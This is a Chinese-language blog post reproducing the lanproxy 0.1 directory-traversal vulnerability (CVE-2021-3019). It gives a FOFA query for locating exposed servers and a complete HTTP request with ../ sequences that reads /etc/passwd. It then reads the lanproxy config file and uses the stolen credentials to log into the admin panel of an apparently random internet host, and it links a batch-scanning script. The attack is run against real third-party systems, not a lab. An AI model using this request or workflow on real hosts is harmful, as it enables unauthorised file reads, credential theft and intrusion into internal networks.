lanproxy 目录遍历漏洞复现(CVE-2021-3019)


漏洞描述

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面…)。目前市面上提供类似服务的有花生壳、TeamView、GoToMyCloud等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据安全也是一大隐患。

此次该lanproxy爆出的漏洞可以让攻击者通过构造恶意请求,读取服务器上的任意文件,甚至可以可直接获取到lanproxy配置文件,从而登录lanproxy管理后台进入内网。

影响版本

  • lanproxy 0.1

漏洞验证

在fofa上用如下fofa语法搜索暴露在公网上的lanproxy:

header= "Server: LPS-0.1"

如上图所示,总共可以发现2029条数据。我们随便访问其中的一个:

image-20210111123855952

抓包并构造恶意请求,读取目标主机上的任意文件:

GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image-20210111124215992

如上图所示,读取成功。

下面我们读取lanproxy的config配置文件:

/../conf/config.properties

image-20210111124606413

如上图所示,读取成功。

我们利用读取到的配置文件中的用户名和密码,可直接在管理后台进行登录,从而访问内网,如下图所示,成功登录:

image-20210111124814408

最后在给出一个批量检测脚本:https://github.com/B1anda0/CVE-2021-3019

修复建议

lanproxy尚未针对该漏洞发布安全更新,建议禁止将lanproxy管理面板对外部开放。


Author: WHOAMI
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint polocy. If reproduced, please indicate source WHOAMI !
评论
 Previous
Laravel Debug mode RCE(CVE-2021-3129)漏洞复现 Laravel Debug mode RCE(CVE-2021-3129)漏洞复现
[toc] 前言Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug
2021-01-15
Next 
CVE-2020-17518/17519:Apache Flink 任意文件上传、目录遍历漏洞 CVE-2020-17518/17519:Apache Flink 任意文件上传、目录遍历漏洞
[toc] 漏洞简述Apache Flink 是高效和分布式的通用数据处理平台,用于在无界和有界数据流上进行有状态的计算。Flink被设计为在所有常见的集群环境中运行,以内存中的速度和任何规模执行计算。 2021年01月06日,360CE
2021-01-06
  TOC